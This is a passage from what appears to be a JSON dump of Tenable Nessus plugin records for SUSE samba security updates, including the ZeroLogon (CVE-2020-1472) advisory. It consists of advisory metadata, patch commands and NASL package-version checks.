reference:\"libnetapi0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-credentials0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-errors0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-hostconfig0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-passdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamba-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsamdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-debugsource-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:12", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2724-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap0", "p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2724-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143807", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2724-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143807);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2724-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202724-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5a60bae9\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2020-2724=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2020-2724=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2020-2724=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2020-2724=1\n\nSUSE Linux Enterprise High Availability 12-SP2 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP2-2020-2724=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-debuginfo-4.4.2-38.36.1\")) 